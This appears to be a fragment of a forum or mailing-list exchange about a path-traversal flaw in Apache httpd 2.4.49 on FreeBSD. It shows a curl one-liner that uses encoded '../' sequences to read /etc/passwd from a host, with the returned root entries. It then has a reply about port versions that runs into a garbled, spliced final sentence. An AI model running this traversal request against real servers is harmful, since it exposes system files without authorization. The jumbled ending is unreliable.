curl http://172.31.1.200//cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
# $FreeBSD$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
Correct. The new port version is 2.4.50. I'm running 2.4.49, that version has the security update too. See http://httpd.apache.org/security/vulnerabilities_24.html for details.doesn't work on a default installation.